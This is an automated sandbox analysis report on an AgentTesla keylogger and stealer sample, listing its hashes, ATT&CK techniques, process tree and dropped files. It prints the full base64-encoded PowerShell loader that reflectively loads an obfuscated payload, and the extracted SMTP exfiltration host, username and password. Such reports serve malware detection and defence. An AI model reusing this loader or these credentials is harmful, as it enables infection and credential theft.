agenttesla | 3b254f8a4c56c1eb0e48ffbbcb1024149a009b4ec4123d913059e8038fa09183

Analysis

max time kernel
67s
max time network
51s
platform
windows10-2004_x64
resource
win10v2004-20240419-en
resource tags

arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
submitted
01/05/2024, 01:28

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

3b254f8a4c56c1eb0e48ffbbcb1024149a009b4ec4123d913059e8038fa09183.exe
Size

332KB
MD5

48fb8d3e38e1bcbee6398d2994764730
SHA1

59af4f0dcf814ab16f35dfa27dec423fae56772c
SHA256

3b254f8a4c56c1eb0e48ffbbcb1024149a009b4ec4123d913059e8038fa09183
SHA512

2243ba06a132ced2d4188785fc9e02de1ccafc8fec479409bccace5ab4fa71ba84d28fd9defed9f9521e54d81dbcd34e8a12d1bad418b8c04a06e7f9783d9cb6
SSDEEP

6144:3fL+oq6sq12PAjvjHSPMW3JB68oZmaYtJ7lbwum:3fLDsqI+jSPLoZBP

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
proglass.com.sg
Port:
587
Username:
[email protected]
Password:
NiconPay$
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	wscript.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	api.ipify.org

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3056 set thread context of 3900	3056	powershell.exe	93

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4304	powershell.exe
4304	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4304	powershell.exe
Token: SeDebugPrivilege	3056	powershell.exe
Token: SeDebugPrivilege	3900	RegAsm.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3900	RegAsm.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1996 wrote to memory of 4864	1996	3b254f8a4c56c1eb0e48ffbbcb1024149a009b4ec4123d913059e8038fa09183.exe	87
PID 1996 wrote to memory of 4864	1996	3b254f8a4c56c1eb0e48ffbbcb1024149a009b4ec4123d913059e8038fa09183.exe	87
PID 1996 wrote to memory of 4864	1996	3b254f8a4c56c1eb0e48ffbbcb1024149a009b4ec4123d913059e8038fa09183.exe	87
PID 4864 wrote to memory of 5044	4864	wscript.exe	88
PID 4864 wrote to memory of 5044	4864	wscript.exe	88
PID 4864 wrote to memory of 5044	4864	wscript.exe	88
PID 5044 wrote to memory of 4304	5044	cmd.exe	90
PID 5044 wrote to memory of 4304	5044	cmd.exe	90
PID 5044 wrote to memory of 4304	5044	cmd.exe	90
PID 5044 wrote to memory of 3056	5044	cmd.exe	91
PID 5044 wrote to memory of 3056	5044	cmd.exe	91
PID 5044 wrote to memory of 3056	5044	cmd.exe	91
PID 3056 wrote to memory of 3900	3056	powershell.exe	93
PID 3056 wrote to memory of 3900	3056	powershell.exe	93
PID 3056 wrote to memory of 3900	3056	powershell.exe	93
PID 3056 wrote to memory of 3900	3056	powershell.exe	93
PID 3056 wrote to memory of 3900	3056	powershell.exe	93
PID 3056 wrote to memory of 3900	3056	powershell.exe	93
PID 3056 wrote to memory of 3900	3056	powershell.exe	93
PID 3056 wrote to memory of 3900	3056	powershell.exe	93

C:\Users\Admin\AppData\Local\Temp\3b254f8a4c56c1eb0e48ffbbcb1024149a009b4ec4123d913059e8038fa09183.exe
"C:\Users\Admin\AppData\Local\Temp\3b254f8a4c56c1eb0e48ffbbcb1024149a009b4ec4123d913059e8038fa09183.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1996
- C:\Windows\SysWOW64\wscript.exe
  "wscript.exe" "C:\Users\Admin\start.vbs"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5044
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('IyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBiZSBhIG1pc3Rha2UuIg0KDQpmdW5jdGlvbiBEZWNvbXByZXNzQnl0ZXMoJGNvbXByZXNzZWREYXRhKSB7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGNvbXByZXNzZWREYXRhKSkpOyAkbXMuUG9zaXRpb24gPSAwOyAkZGVmbGF0ZVN0cmVhbSA9IFtJTy5Db21wcmVzc2lvbi5EZWZsYXRlU3RyZWFtXTo6bmV3KCRtcywgW0lPLkNvbXByZXNzaW9uLkNvbXByZXNzaW9uTW9kZV06OkRlY29tcHJlc3MpOyAkYnVmZmVyID0gW2J5dGVbXV06Om5ldyg0MDk2KTsgJG1zID0gW0lPLk1lbW9yeVN0cmVhbV06Om5ldygpOyB3aGlsZSAoJHRydWUpIHsgJGNvdW50ID0gJGRlZmxhdGVTdHJlYW0uUmVhZCgkYnVmZmVyLCAwLCAkYnVmZmVyLkxlbmd0aCk7IGlmICgkY291bnQgLWVxIDApIHsgYnJlYWsgfSAkbXMuV3JpdGUoJGJ1ZmZlciwgMCwgJGNvdW50KSB9ICRkZWZsYXRlU3RyZWFtLkNsb3NlKCk7ICRtcy5Ub0FycmF5KCkgfQ0KDQojICJUaGUgc3VyZXN0IHdheSB0byBjb3JydXB0IGEgeW91dGggaXMgdG8gaW5zdHJ1Y3QgaGltIHRvIGhvbGQgaW4gaGlnaGVyIGVzdGVlbSB0aG9zZSB3aG8gdGhpbmsgYWxpa2UgdGhhbiB0aG9zZSB3aG8gdGhpbmsgZGlmZmVyZW50bHkuIg0KIyAiSW4gaGVhdmVuLCBhbGwgdGhlIGludGVyZXN0aW5nIHBlb3BsZSBhcmUgbWlzc2luZy4iDQoNCg0KDQpmdW5jdGlvbiBSZXZlcnNlU3RyaW5nKCRpbnB1dFN0cmluZykgew0KICAgICRjaGFyQXJyYXkgPSAkaW5wdXRTdHJpbmcuVG9DaGFyQXJyYXkoKQ0KICAgICRyZXZlcnNlZEFycmF5ID0gJGNoYXJBcnJheVstMS4uLSgkY2hhckFycmF5Lkxlbmd0aCldDQogICAgJHJldmVyc2VkU3RyaW5nID0gLWpvaW4gJHJldmVyc2VkQXJyYXkNCiAgICByZXR1cm4gJHJldmVyc2VkU3RyaW5nDQp9DQojICJUaGVyZSBpcyBhbHdheXMgc29tZSBtYWRuZXNzIGluIGxvdmUuIEJ1dCB0aGVyZSBpcyBhbHNvIGFsd2F5cyBzb21lIHJlYXNvbiBpbiBtYWRuZXNzLiINCiMgIlRoYXQgd2hpY2ggZG9lcyBub3Qga2lsbCB1cyBtYWtlcyB1cyBzdHJvbmdlci4iDQoNCmZ1bmN0aW9uIENsb3NlLVByb2Nlc3Mgew0KICAgIHBhcmFtKA0KICAgICAgICBbc3RyaW5nXSRQcm9jZXNzTmFtZQ0KICAgICkNCg0KICAgICRwcm9jZXNzID0gR2V0LVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1FcnJvckFjdGlvbiBTaWxlbnRseUNvbnRpbnVlDQoNCiAgICBpZiAoJHByb2Nlc3MgLW5lICRudWxsKSB7DQogICAgICAgIFN0b3AtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUZvcmNlDQoJfQ0KfQ0KIyAiSW4gaW5kaXZpZHVhbHMsIGluc2FuaXR5IGlzIHJhcmU7IGJ1dCBpbiBncm91cHMsIHBhcnRpZXMsIG5hdGlvbnMsIGFuZCBlcG9jaHMsIGl0IGlzIHRoZSBydWxlLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KDQokZW5jb2RlZEFycmF5ID0gQCgxNTksMjIwLDIzOCwyMzgsMjI0LDIzMiwyMjEsMjMxLDI0NCwxNjksMTkyLDIzMywyMzksMjM3LDI0NCwyMDMsMjM0LDIyOCwyMzMsMjM5LDE2OSwxOTYsMjMzLDI0MSwyMzQsMjMwLDIyNCwxNjMsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjcsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjQsMTgyKQ0KJGRlY29kZWRTdHJpbmcgPSBDTlYgJGVuY29kZWRBcnJheQ0KDQoNCiRmaWxlUGF0aCA9IEpvaW4tUGF0aCAkZW52OlVzZXJQcm9maWxlICJ2S01QUWQuYmF0Ig0KJGxhc3RMaW5lID0gR2V0LUNvbnRlbnQgLVBhdGggJGZpbGVQYXRoIHwgU2VsZWN0LU9iamVjdCAtTGFzdCAxDQokY2xlYW5lZExpbmUgPSAkbGFzdExpbmUgLXJlcGxhY2UgJ146OicNCiRyZXZlcnNlID0gUmV2ZXJzZVN0cmluZyAkY2xlYW5lZExpbmUNCiRkZWNvbXByZXNzZWRCeXRlID0gRGVjb21wcmVzc0J5dGVzIC1jb21wcmVzc2VkRGF0YSAkcmV2ZXJzZQ0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQokYXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGRlY29tcHJlc3NlZEJ5dGUpDQoNCg0KQ2xvc2UtUHJvY2VzcyAtUHJvY2Vzc05hbWUgImNtZCINCkludm9rZS1FeHByZXNzaW9uICRkZWNvZGVkU3RyaW5n')) | Out-File -FilePath 'C:\Users\Admin\vKMPQd.ps1' -Encoding UTF8"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4304
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\vKMPQd.ps1"
      4⤵
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3056
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3900

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
4280e36a29fa31c01e4d8b2ba726a0d8

SHA1
c485c2c9ce0a99747b18d899b71dfa9a64dabe32

SHA256
e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

SHA512
494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
661e6780fa113db8b84bd1d8d2ed3be7

SHA1
dc241a215c95049cebc4fe0865583e1d6e15d6e7

SHA256
97331c3010aefab61f50b45219f06ea594392dd953d9daf26b74bf6a5477062b

SHA512
b3937afd380dbddc798e4aa9165851879d67ce5f153f4105206a6ec3010c0a465f3b3bcb41e705e1e2dc638ffea886b1d0de6d5ad1a02544b75b6175cc5c26b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_31xxdsmv.hmq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\start.vbs

Filesize
173B

MD5
2fd98bad7e3e521d8a67acfa4a681a86

SHA1
545fd01deb3a8cc9f605aa33ea2b060e9b904c5b

SHA256
aa1ed4fef63aad3ca2461ab76ab18890bffb7554100bee65dd7665b213c25706

SHA512
3aafad51333b06e31d4c6965f1b2d81f4e7d5ebd7334bec2ebbe648930154dfc34848d96a4cd27a43e3d709a0b4a24eb3d3bf77d91c10733975f9e95a24f44c8

Download Submit
C:\Users\Admin\temp.bat

Filesize
277KB

MD5
8b4e4571f1b43434f6ed2b668dddf598

SHA1
4b7cbd44f9dbdf4e7297fd10a13c587dad3541a2

SHA256
ba51fc7d4bd3f667bf018b96e2afd34dc18e766839b2e3a5cf4232f6c34ff7bb

SHA512
10089e93684e5131576107933d11cf6107ea44a705d04a52d2513d16ab3cc209b15b00c15cfc1abb93965def900cfce8ddc42d8e157e4f0bc4d7dc98fd1c40be

Download Submit
C:\Users\Admin\vKMPQd.ps1

Filesize
2KB

MD5
452a171820a72b38003c5cf1b8969851

SHA1
342916fe746fa239bfc44aed2b756c031b6b3358

SHA256
9f60027ef0813cd4797d797a6a4d7e1397913e9078b911c07a63d5e6b79ce28d

SHA512
fbee68566ca39766eed2e760f2a99fe692a975eddd325d1ed1df01417d5e072c03c6167ac915de32f00c1d7ca43dc02fda3b5cd94bd6ac4ed9ac86f9876e44ff

Download Submit
memory/3056-45-0x0000000007950000-0x00000000079E6000-memory.dmp

Filesize
600KB

Download
memory/3056-50-0x0000000002E20000-0x0000000002E2A000-memory.dmp

Filesize
40KB

Download
memory/3056-49-0x00000000065A0000-0x000000000661E000-memory.dmp

Filesize
504KB

Download
memory/3056-47-0x00000000080B0000-0x0000000008654000-memory.dmp

Filesize
5.6MB

Download
memory/3056-46-0x00000000079F0000-0x0000000007A12000-memory.dmp

Filesize
136KB

Download
memory/3056-42-0x0000000006240000-0x0000000006594000-memory.dmp

Filesize
3.3MB

Download
memory/3900-51-0x0000000000400000-0x0000000000442000-memory.dmp

Filesize
264KB

Download
memory/3900-53-0x0000000006DD0000-0x0000000006E20000-memory.dmp

Filesize
320KB

Download
memory/3900-54-0x0000000006EC0000-0x0000000006F52000-memory.dmp

Filesize
584KB

Download
memory/3900-55-0x0000000006E90000-0x0000000006E9A000-memory.dmp

Filesize
40KB

Download
memory/4304-11-0x0000000005180000-0x00000000051A2000-memory.dmp

Filesize
136KB

Download
memory/4304-31-0x00000000749F0000-0x00000000751A0000-memory.dmp

Filesize
7.7MB

Download
memory/4304-27-0x0000000006FD0000-0x0000000006FEA000-memory.dmp

Filesize
104KB

Download
memory/4304-26-0x0000000007840000-0x0000000007EBA000-memory.dmp

Filesize
6.5MB

Download
memory/4304-25-0x00000000061C0000-0x000000000620C000-memory.dmp

Filesize
304KB

Download
memory/4304-24-0x0000000005F20000-0x0000000005F3E000-memory.dmp

Filesize
120KB

Download
memory/4304-23-0x0000000005A90000-0x0000000005DE4000-memory.dmp

Filesize
3.3MB

Download
memory/4304-12-0x0000000005940000-0x00000000059A6000-memory.dmp

Filesize
408KB

Download
memory/4304-13-0x0000000005A20000-0x0000000005A86000-memory.dmp

Filesize
408KB

Download
memory/4304-10-0x0000000004BE0000-0x0000000004BF0000-memory.dmp

Filesize
64KB

Download
memory/4304-9-0x0000000005220000-0x0000000005848000-memory.dmp

Filesize
6.2MB

Download
memory/4304-7-0x00000000749F0000-0x00000000751A0000-memory.dmp

Filesize
7.7MB

Download
memory/4304-8-0x0000000004BE0000-0x0000000004BF0000-memory.dmp

Filesize
64KB

Download
memory/4304-6-0x0000000004B70000-0x0000000004BA6000-memory.dmp

Filesize
216KB

Download